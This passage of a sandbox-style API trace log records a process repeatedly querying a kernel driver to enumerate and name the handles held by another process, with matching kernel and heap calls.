| out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0139.192] ObReferenceObjectByHandle (in: Handle=0x4e4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80036bb750, HandleInformation=0x0) returned 0x0 [0139.192] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.192] PsReleaseProcessExitSynchronization () returned 0x2 [0139.192] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0139.193] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800290d484, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa800290d484, ReturnLength=0xfffff88005163508) returned 0x0 [0139.193] ObfDereferenceObject (Object=0xfffffa80036bb750) returned 0x12 [0139.193] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.193] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.193] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.193] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x104, lpOverlapped=0x0) returned 1 [0139.193] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.193] PsAcquireProcessExitSynchronization () returned 0x0 [0139.193] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0139.193] ObReferenceObjectByHandle (in: Handle=0x4ec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80036bb4b0, HandleInformation=0x0) returned 0x0 [0139.193] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.193] PsReleaseProcessExitSynchronization () returned 0x2 [0139.193] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0139.193] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002ee8044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002ee8044, ReturnLength=0xfffff88005163508) returned 0x0 [0139.193] ObfDereferenceObject (Object=0xfffffa80036bb4b0) returned 0x13 [0139.193] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.193] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.193] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.193] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xda, lpOverlapped=0x0) returned 1 [0139.193] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.193] PsAcquireProcessExitSynchronization () returned 0x0 [0139.193] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0139.194] ObReferenceObjectByHandle (in: Handle=0x504, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003759750, HandleInformation=0x0) returned 0x0 [0139.194] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.194] PsReleaseProcessExitSynchronization () returned 0x2 [0139.194] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0139.194] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002f81044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f81044, ReturnLength=0xfffff88005163508) returned 0x0 [0139.194] ObfDereferenceObject (Object=0xfffffa8003759750) returned 0x12 [0139.194] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.194] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.194] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.194] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x104, lpOverlapped=0x0) returned 1 [0139.194] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.194] PsAcquireProcessExitSynchronization () returned 0x0 [0139.194] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0139.194] ObReferenceObjectByHandle (in: Handle=0x598, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80034e05a0, HandleInformation=0x0) returned 0x0 [0139.194] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.194] PsReleaseProcessExitSynchronization () returned 0x2 [0139.194] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0139.194] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002f7a044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f7a044, ReturnLength=0xfffff88005163508) returned 0x0 [0139.194] ObfDereferenceObject (Object=0xfffffa80034e05a0) returned 0x20 [0139.194] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.195] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.195] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.195] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xc4, lpOverlapped=0x0) returned 1 [0139.195] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.195] PsAcquireProcessExitSynchronization () returned 0x0 [0139.195] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0139.195] ObReferenceObjectByHandle (in: Handle=0x5a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80034dd3d0, HandleInformation=0x0) returned 0x0 [0139.195] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.195] PsReleaseProcessExitSynchronization () returned 0x2 [0139.195] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0139.195] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002f75044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f75044, ReturnLength=0xfffff88005163508) returned 0x0 [0139.195] ObfDereferenceObject (Object=0xfffffa80034dd3d0) returned 0x12 [0139.195] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.195] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.195] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.195] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xf4, lpOverlapped=0x0) returned 1 [0139.195] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.195] PsAcquireProcessExitSynchronization () returned 0x0 [0139.195] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0139.195] ObReferenceObjectByHandle (in: Handle=0x5b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800369ee60, HandleInformation=0x0) returned 0x0 [0139.195] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.195] PsReleaseProcessExitSynchronization () returned 0x2 [0139.196] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0139.196] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002ef3044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002ef3044, ReturnLength=0xfffff88005163508) returned 0x0 [0139.196] ObfDereferenceObject (Object=0xfffffa800369ee60) returned 0x12 [0139.196] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.196] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.196] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.196] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x110, lpOverlapped=0x0) returned 1 [0139.196] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.196] PsAcquireProcessExitSynchronization () returned 0x0 [0139.196] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0139.196] ObReferenceObjectByHandle (in: Handle=0x5b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80039b4140, HandleInformation=0x0) returned 0x0 [0139.196] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.196] PsReleaseProcessExitSynchronization () returned 0x2 [0139.196] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0139.196] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002ef2044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002ef2044, ReturnLength=0xfffff88005163508) returned 0x0 [0139.196] ObfDereferenceObject (Object=0xfffffa80039b4140) returned 0x12 [0139.196] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.196] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.196] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.196] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xf4, lpOverlapped=0x0) returned 1 [0139.196] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.196] PsAcquireProcessExitSynchronization () returned 0x0 [0139.197] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0139.197] ObReferenceObjectByHandle (in: Handle=0x5bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80034ef820, HandleInformation=0x0) returned 0x0 [0139.197] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.197] PsReleaseProcessExitSynchronization () returned 0x2 [0139.197] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0139.197] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002ef1044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002ef1044, ReturnLength=0xfffff88005163508) returned 0x0 [0139.197] ObfDereferenceObject (Object=0xfffffa80034ef820) returned 0x12 [0139.197] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.197] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.197] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.197] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xfe, lpOverlapped=0x0) returned 1 [0139.197] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.197] PsAcquireProcessExitSynchronization () returned 0x0 [0139.198] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0139.198] ObReferenceObjectByHandle (in: Handle=0x5c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80034d75f0, HandleInformation=0x0) returned 0x0 [0139.198] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.198] PsReleaseProcessExitSynchronization () returned 0x2 [0139.198] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0139.198] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002ef0044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002ef0044, ReturnLength=0xfffff88005163508) returned 0x0 [0139.198] ObfDereferenceObject (Object=0xfffffa80034d75f0) returned 0x12 [0139.198] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.198] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.198] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.198] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x11a, lpOverlapped=0x0) returned 1 [0139.198] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.198] PsAcquireProcessExitSynchronization () returned 0x0 [0139.198] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0139.198] ObReferenceObjectByHandle (in: Handle=0x5c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80034e03d0, HandleInformation=0x0) returned 0x0 [0139.198] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.198] PsReleaseProcessExitSynchronization () returned 0x2 [0139.198] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0139.198] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002f1b044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f1b044, ReturnLength=0xfffff88005163508) returned 0x0 [0139.198] ObfDereferenceObject (Object=0xfffffa80034e03d0) returned 0x12 [0139.198] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.199] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.199] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.199] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xf4, lpOverlapped=0x0) returned 1 [0139.199] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.199] PsAcquireProcessExitSynchronization () returned 0x0 [0139.199] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0139.199] ObReferenceObjectByHandle (in: Handle=0x5cc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80034d7900, HandleInformation=0x0) returned 0x0 [0139.199] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.199] PsReleaseProcessExitSynchronization () returned 0x2 [0139.199] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0139.199] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002f82044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f82044, ReturnLength=0xfffff88005163508) returned 0x0 [0139.199] ObfDereferenceObject (Object=0xfffffa80034d7900) returned 0x13 [0139.199] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.199] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.199] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.199] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xd6, lpOverlapped=0x0) returned 1 [0139.199] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.199] PsAcquireProcessExitSynchronization () returned 0x0 [0139.199] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0139.199] ObReferenceObjectByHandle (in: Handle=0x5d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003748070, HandleInformation=0x0) returned 0x0 [0139.200] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.200] PsReleaseProcessExitSynchronization () returned 0x2 [0139.200] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0139.200] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002f83044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f83044, ReturnLength=0xfffff88005163508) returned 0x0 [0139.200] ObfDereferenceObject (Object=0xfffffa8003748070) returned 0x12 [0139.200] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.200] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.200] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.200] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xd8, lpOverlapped=0x0) returned 1 [0139.200] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.200] PsAcquireProcessExitSynchronization () returned 0x0 [0139.200] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0139.200] ObReferenceObjectByHandle (in: Handle=0x5e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80034e38b0, HandleInformation=0x0) returned 0x0 [0139.200] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.200] PsReleaseProcessExitSynchronization () returned 0x2 [0139.200] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0139.200] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002f84044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f84044, ReturnLength=0xfffff88005163508) returned 0x0 [0139.200] ObfDereferenceObject (Object=0xfffffa80034e38b0) returned 0x20 [0139.200] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.200] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.200] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.200] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x118, lpOverlapped=0x0) returned 1 [0139.201] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.201] PsAcquireProcessExitSynchronization () returned 0x0 [0139.201] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0139.201] ObReferenceObjectByHandle (in: Handle=0x5e8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80034eaf20, HandleInformation=0x0) returned 0x0 [0139.201] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.201] PsReleaseProcessExitSynchronization () returned 0x2 [0139.201] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0139.201] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002f86044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f86044, ReturnLength=0xfffff88005163508) returned 0x0 [0139.201] ObfDereferenceObject (Object=0xfffffa80034eaf20) returned 0x12 [0139.201] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.201] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.201] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.201] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xea, lpOverlapped=0x0) returned 1 [0139.201] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.201] PsAcquireProcessExitSynchronization () returned 0x0 [0139.201] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0139.201] ObReferenceObjectByHandle (in: Handle=0x600, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003ac8970, HandleInformation=0x0) returned 0x0 [0139.201] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.201] PsReleaseProcessExitSynchronization () returned 0x2 [0139.202] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0139.202] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030c0044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030c0044, ReturnLength=0xfffff88005163508) returned 0x0 [0139.202] ObfDereferenceObject (Object=0xfffffa8003ac8970) returned 0x12 [0139.202] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.202] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.202] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.202] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x3c, lpOverlapped=0x0) returned 1 [0139.202] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.202] PsAcquireProcessExitSynchronization () returned 0x0 [0139.202] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0139.202] ObReferenceObjectByHandle (in: Handle=0x624, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002ee2610, HandleInformation=0x0) returned 0x0 [0139.202] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.202] PsReleaseProcessExitSynchronization () returned 0x2 [0139.202] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0139.202] ObQueryNameString (in: Object=0xfffffa8002ee2610, ObjectNameInfo=0xfffffa80030c1044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030c1044, ReturnLength=0xfffff88005163550) returned 0x0 [0139.202] ObfDereferenceObject 